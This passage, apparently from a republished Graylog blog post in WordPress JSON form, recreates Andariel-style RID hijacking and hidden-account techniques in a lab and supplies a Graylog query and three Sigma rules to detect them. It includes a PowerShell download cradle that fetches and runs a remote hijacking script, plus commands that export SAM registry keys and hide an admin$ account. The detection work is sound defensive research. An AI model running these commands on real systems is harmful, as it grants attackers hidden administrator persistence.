300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image27-1024x445.png 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image27-768x334.png 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image27-1536x667.png 1536w\" sizes=\"auto, (max-width: 1818px) 100vw, 1818px\"><\/p>\n<p>Those with their detection hat on might notice that the filenames are notably unique and static throughout the tool execution. These names are actually hardcoded in the source code, seen in the function below.<\/p>\n<p><picture loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-30054\">\n<source type=\"image\/webp\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image12-1024x501.png.webp 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image12-300x147.png.webp 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image12-768x376.png.webp 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image12-1536x751.png.webp 1536w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image12.png.webp 1560w\" sizes=\"(max-width: 800px) 100vw, 800px\">\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image12-1024x501.png\" alt=\"Tool Execution\" width=\"800\" height=\"391\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image12-1024x501.png 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image12-300x147.png 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image12-768x376.png 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image12-1536x751.png 1536w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image12.png 1560w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\">\n<\/picture>\n<\/p>\n<p>This presents an opportunity to detect CreateHiddenAccount execution via child process command lines where the unique filenames are present. Note though that this is considered a brittle detection \u2013 while it can reliably identify this particular version of CreateHiddenAccount unmodified, it is trivial for the adversary to change these filenames in the source before compiling to an executable.<\/p>\n<p>&nbsp;<\/p>\n<p>Nonetheless, it\u2019s useful in a threat hunt or to detect the vanilla tool. We can use the following query:<\/p>\n<pre><code>process_command_line:(\/.*N2kvMLEQiiHHNWXFpEg7uaNmcu9ic95j8\\.ini\/ OR \/.*sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko\\.reg\/)<\/code><\/pre>\n<p><img loading=\"lazy\" data-attachment-id=\"30056\" data-permalink=\"https:\/\/version-2.com\/zh\/cloud_service_portnox_nac\/untitled-1-03-3\/\" data-orig-file=\"https:\/\/version-2.com\/wp-content\/uploads\/2021\/03\/Untitled-1-03.png\" data-orig-size=\"332,332\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Untitled-1-03\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/version-2.com\/wp-content\/uploads\/2021\/03\/Untitled-1-03.png\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-30056 size-full\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image21.png\" alt=\"Process Command Line\" width=\"1809\" height=\"661\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image21.png 1809w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image21-300x110.png 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image21-1024x374.png 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image21-768x281.png 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image21-1536x561.png 1536w\" sizes=\"auto, (max-width: 1809px) 100vw, 1809px\"><\/p>\n<p>&nbsp;<\/p>\n<p>The tool by itself doesn\u2019t do much in the way of behavior obfuscation or sandbox evasion. Querying its hash on VirusTotal returns some <a href=\"https:\/\/www.virustotal.com\/gui\/file\/db74fa7e8e62c8583437e68d6e0018bc3f8fbfca24a103a699b04ca619f06a84\/detection\">damning results<\/a>.<\/p>\n<p><picture loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-30057\">\n<source type=\"image\/webp\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image5-1024x786.png.webp 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image5-300x230.png.webp 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image5-768x590.png.webp 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image5.png.webp 1463w\" sizes=\"(max-width: 800px) 100vw, 800px\">\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image5-1024x786.png\" alt=\"VirusTotal\" width=\"800\" height=\"614\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image5-1024x786.png 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image5-300x230.png 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image5-768x590.png 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image5.png 1463w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\">\n<\/picture>\n<\/p>\n<p>&nbsp;<\/p>\n<h2><strong>Further Attempts to Hide Users<\/strong><\/h2>\n<p>&nbsp;<\/p>\n<p>In addition to hiding the backdoor user account with a username ending in $, the custom tool used by Andariel attempts to further conceal the account through deletion and registry import operations. We analyzed a similar feature in CreateHiddenAccount, but now we\u2019ll carry out the technique separately and see what can be gleaned from the logs.<\/p>\n<p>&nbsp;<\/p>\n<p>As demonstrated below, we repeat the steps of SYSTEM privilege escalation and hidden user account creation, but this time we run a PowerShell download cradle to fetch and execute in-memory a RID hijacking script from GitHub. This leaves us with the account given administrator privileges without further action to conceal it.<\/p>\n<pre><code>IEX (New-Object Net.WebClient).DownloadString('https:\/\/raw.githubusercontent.com\/r4wd3r\/RID-Hijacking\/master\/Invoke-RIDHijacking.ps1'); Invoke-RIDHijacking -User 'admin$' -RID 500<\/code><\/pre>\n<p><picture loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-30058\">\n<source type=\"image\/webp\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image22-1024x656.png.webp 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image22-300x192.png.webp 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image22-768x492.png.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\">\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image22-1024x656.png\" alt=\"Powershell Script Run\" width=\"800\" height=\"513\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image22-1024x656.png 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image22-300x192.png 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image22-768x492.png 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image22.png 1103w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\">\n<\/picture>\n<\/p>\n<p>&nbsp;<\/p>\n<p>Graylog Illuminate captures the PowerShell script execution and even extracts the SAM registry key path being modified for RID hijacking.<\/p>\n<p><img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-30059 size-full\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image4.png\" alt=\"Fake Computer Name\" width=\"1734\" height=\"790\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image4.png 1734w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image4-300x137.png 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image4-1024x467.png 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image4-768x350.png 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image4-1536x700.png 1536w\" sizes=\"auto, (max-width: 1734px) 100vw, 1734px\"><\/p>\n<p>Even with the fake computer name, the hidden user still shows up in Computer Management.<\/p>\n<p><picture loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-30061\">\n<source type=\"image\/webp\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image16-1024x349.png.webp 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image16-300x102.png.webp 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image16-768x262.png.webp 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image16.png.webp 1243w\" sizes=\"(max-width: 800px) 100vw, 800px\">\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image16-1024x349.png\" alt=\"Computer Fake Name\" width=\"800\" height=\"273\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image16-1024x349.png 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image16-300x102.png 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image16-768x262.png 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image16.png 1243w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\">\n<\/picture>\n<\/p>\n<p>&nbsp;<\/p>\n<p>Following along with the Andariel threat group\u2019s tool methods, we run commands to:<\/p>\n<p>&nbsp;<\/p>\n<p><strong>A) Fetch the hidden user\u2019s RID<\/strong><\/p>\n<pre><code>Get-WmiObject Win32_UserAccount | Where-Object { $_.Name -eq 'admin$' } | Select-Object Name, SID<\/code><\/pre>\n<p>&nbsp;<\/p>\n<p><strong>B) Export the hidden user\u2019s associated registry keys in the SAM hive<\/strong><\/p>\n<pre><code>reg export hklm\\sam\\sam\\domains\\account\\users\\names\\admin$ names.reg<\/code><\/pre>\n<pre><code>reg export hklm\\sam\\sam\\domains\\account\\users\\0000XXXX users.reg<\/code><\/pre>\n<p>&nbsp;<\/p>\n<p><strong>C) Delete the user<\/strong><\/p>\n<pre><code>net user admin$ \/delete<\/code><\/pre>\n<p>&nbsp;<\/p>\n<p><strong>D) Restore the user by importing the registry files containing the user keys information<\/strong><\/p>\n<pre><code>reg import names.reg<\/code><\/pre>\n<pre><code>reg import users.reg<\/code><\/pre>\n<p>&nbsp;<\/p>\n<p>By using this method, admin$ is no longer displayed in Computer Management, at least until a system reboot.<\/p>\n<p><picture loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-30062\">\n<source type=\"image\/webp\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image15-1024x685.png.webp 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image15-300x201.png.webp 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image15-768x514.png.webp 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image15.png.webp 1244w\" sizes=\"(max-width: 800px) 100vw, 800px\">\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image15-1024x685.png\" alt=\"No Admin User Shown\" width=\"800\" height=\"535\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image15-1024x685.png 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image15-300x201.png 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image15-768x514.png 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image15.png 1244w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\">\n<\/picture>\n<\/p>\n<p>&nbsp;<\/p>\n<p>Every step of the execution can be seen in Graylog.<\/p>\n<p><img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-30063 size-full\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image25.png\" alt=\"Attack Steps Log\" width=\"1707\" height=\"1421\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image25.png 1707w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image25-300x250.png 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image25-1024x852.png 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image25-768x639.png 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image25-1536x1279.png 1536w\" sizes=\"auto, (max-width: 1707px) 100vw, 1707px\"><\/p>\n<p>&nbsp;<\/p>\n<h2><strong>Detections<\/strong><\/h2>\n<p>&nbsp;<\/p>\n<p>We\u2019ve provided Sigma rules below to detect the following aspects of the attack chain:<\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li>Hidden user account with Administrator RID<\/li>\n<li>RID hijacking via CreateHiddenAccount<\/li>\n<li>Export of SAM users registry keys via reg.exe<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>With Graylog Security, we can manually add these rules and configure timed search intervals to detect the activity in our log ingest.<\/p>\n<p>&nbsp;<\/p>\n<p>The Sigma engine in Graylog provides an option to search the logs using the detector before deployment. This way you can also see the exact search query the rule translates to.<\/p>\n<p><picture loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-30064\">\n<source type=\"image\/webp\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image19-1024x718.png.webp 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image19-300x210.png.webp 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image19-768x538.png.webp 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image19-1536x1077.png.webp 1536w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image19.png.webp 1809w\" sizes=\"(max-width: 800px) 100vw, 800px\">\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image19-1024x718.png\" alt=\"Sigma Rule Added\" width=\"800\" height=\"561\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image19-1024x718.png 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image19-300x210.png 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image19-768x538.png 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image19-1536x1077.png 1536w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image19.png 1809w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\">\n<\/picture>\n<\/p>\n<p>Rule #1<\/p>\n<pre><code>title: Illuminate - Hidden User Account With Administrator RID\nid: 531bfab7-d18c-4f51-bae0-64cf38cae3d5\nstatus: experimental\ndescription: Detects special privileges assigned to a hidden account manipulated with admin RID hijacking\nreferences:\n    - https:\/\/asec.ahnlab.com\/en\/85942\/\nauthor: JL (Graylog)\ndate: 2025\/02\/04  # Graylog format\ntags:\n    - attack.privilege-escalation\n    - attack.t1078\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection_event:\n        EventID: 4672\n    selection_name:\n        SubjectUserName|endswith: '$'\n    selection_rid:\n        SubjectUserSid|endswith: '-500'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high<\/code><\/pre>\n<p>Rule #2<\/p>\n<pre><code>title: Illuminate - RID Hijacking Via CreateHiddenAccount\nid: 8b8fdf38-4e34-4d7b-bdaa-b3b9920fb80b\nstatus: experimental\ndescription: Detects the open-source tool CreateHiddenAccount (unmodified) used by Andariel threat group for RID hijacking\nreferences:\n    - https:\/\/github.com\/wgpsec\/CreateHiddenAccount\/\n    - https:\/\/asec.ahnlab.com\/en\/85942\/\nauthor: JL (Graylog)\ndate: 2025\/02\/04  # Graylog format\ntags:\n    - attack.privilege-escalation\n    - attack.t1078\n    - attack.persistence\n    - attack.t1136.001\n    - attack.t1098\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'N2kvMLEQiiHHNWXFpEg7uaNmcu9ic95j8'   # regini .N2kvMLEQiiHHNWXFpEg7uaNmcu9ic95j8.ini\n            - 'sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko'    # regedit \/s .sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko.reg\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high<\/code><\/pre>\n<p>Rule #3<\/p>\n<pre><code>title: Illuminate - Export of SAM Users Registry Keys Via Reg.exe\nid: 0709625a-4703-47ba-acfd-3beaa4d0f1dc\nstatus: experimental\ndescription: Detects export of SAM user account information via reg export\nreferences:\n    - https:\/\/asec.ahnlab.com\/en\/85942\/\nauthor: JL (Graylog)\ndate: 2025\/02\/04  # Graylog format\ntags:\n    - attack.credential_access\n    - attack.t1003.002\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'export'\n            - 'hklm\\sam\\sam\\domains\\account\\users\\'\n    condition: selection\nfalsepositives:\n    - Administrative scripts or forensic investigations\nlevel: high<\/code><\/pre>\n<h2><\/h2>\n<h2>Graylog&nbsp; Detections<\/h2>\n<p>Graylog has provided the Sigma Rules here to share threat detection intelligence with those not running Graylog Security. Note that <a href=\"https:\/\/graylog.org\/products\/security\/\">Graylog Security<\/a> customers receive a content feed including Sigma Rules, Anomaly Detectors, and Dashboards, and other content to meet various security use cases. For more about Sigma Rules, see our recent blog \u201c<a class=\"c-link\" href=\"https:\/\/graylog.org\/post\/the-ultimate-guide-to-sigma-rules\/\" target=\"_blank\" rel=\"noopener noreferrer\" data-stringify-link=\"https:\/\/graylog.org\/post\/the-ultimate-guide-to-sigma-rules\/\" data-sk=\"tooltip_parent\">The Ultimate Guide to Sigma Rules<\/a>\u201d<\/p>\n<p>To learn how Graylog can help you improve your security posture, <a href=\"https:\/\/www.graylog.org\/contact-us\/?hsLang=en\">contact us today<\/a> or <a href=\"https:\/\/go2.graylog.org\/see-demo-multi-dates?_gl=1*a3v22a*_ga*MTM2MDYxMjQ3OC4xNzA5MDM5NTI3*_ga_4053DBR6X5*MTczMjEyNDI1Ni4xMzguMS4xNzMyMTI5NDUzLjAuMC4w*_ga_NCQ7VMMZNQ*MTczMjEyNDI1Ni4xMzcuMS4xNzMyMTI5NDUzLjAuMC4w\">watch a demo<\/a>.<\/p>\n\t\t<\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-2004c86 elementor-widget elementor-widget-shortcode\" data-id=\"2004c86\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"shortcode.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-shortcode\">\n\t\t<div data-elementor-type=\"page\" data-elementor-id=\"93504\" class=\"elementor elementor-93504\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-6461a578 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"6461a578\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;_id&quot;:&quot;c4f773e&quot;,&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2f063c39\" data-id=\"2f063c39\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-14e1df2a elementor-widget elementor-widget-text-editor\" data-id=\"14e1df2a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><strong>About Graylog\u00a0\u00a0<\/strong><br \/>At Graylog, our vision is a secure digital world where organizations of all sizes can effectively guard against cyber threats. We\u2019re committed to turning this vision into reality by providing Threat Detection &amp; Response that sets the standard for excellence. Our cloud-native architecture delivers SIEM, API Security, and Enterprise Log Management solutions that are not just efficient and effective\u2014whether hosted by us, on-premises, or in your cloud\u2014but also deliver a fantastic Analyst Experience at the lowest total cost of ownership. We aim to equip security analysts with the best tools for the job, empowering every organization to stand resilient in the ever-evolving cybersecurity landscape.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t\t\t<div data-elementor-type=\"page\" data-elementor-id=\"18103\" class=\"elementor elementor-18103\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-748947f elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"748947f\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;c4f773e&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7995c19\" data-id=\"7995c19\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-a437045 elementor-widget elementor-widget-image-box\" data-id=\"a437045\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image-box.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-image-box-wrapper\"><div class=\"elementor-image-box-content\"><h3 class=\"elementor-image-box-title\">About Version 2 Digital<\/h3><p class=\"elementor-image-box-description\">Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.\n<br><br>\nThrough an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.<\/p><\/div><\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Researchers at AhnLab Security Intelligence Center (ASE [&hellip;]<\/p>\n","protected":false},"author":149011790,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1303,1305,61],"tags":[1077,1304],"class_list":["post-103504","post","type-post","status-publish","format-standard","hentry","category-graylog","category-1305","category-press-release","tag-1077","tag-graylog"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Adversary Tradecraft: A Deep Dive into RID Hijacking and Hidden Users - Version 2<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/graylog.org\/post\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\/\" \/>\n<meta property=\"og:locale\" content=\"zh_HK\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Adversary Tradecraft: A Deep Dive into RID Hijacking and Hidden Users - Version 2\" \/>\n<meta property=\"og:description\" content=\"Researchers at AhnLab Security Intelligence Center (ASE [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/graylog.org\/post\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\/\" \/>\n<meta property=\"og:site_name\" content=\"Version 2\" \/>\n<meta property=\"article:published_time\" content=\"2025-02-24T04:39:59+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/RID-Hijacking.jpg.webp\" \/>\n<meta name=\"author\" content=\"tracylamv2\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"tracylamv2\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9810\u8a08\u95b1\u8b80\u6642\u9593\" \/>\n\t<meta name=\"twitter:data2\" content=\"13 \u5206\u9418\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/graylog.org\\\/post\\\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/2025\\\/02\\\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\\\/\"},\"author\":{\"name\":\"tracylamv2\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/person\\\/011bc7c3731c930bcfeecd52fefb6365\"},\"headline\":\"Adversary Tradecraft: A Deep Dive into RID Hijacking and Hidden 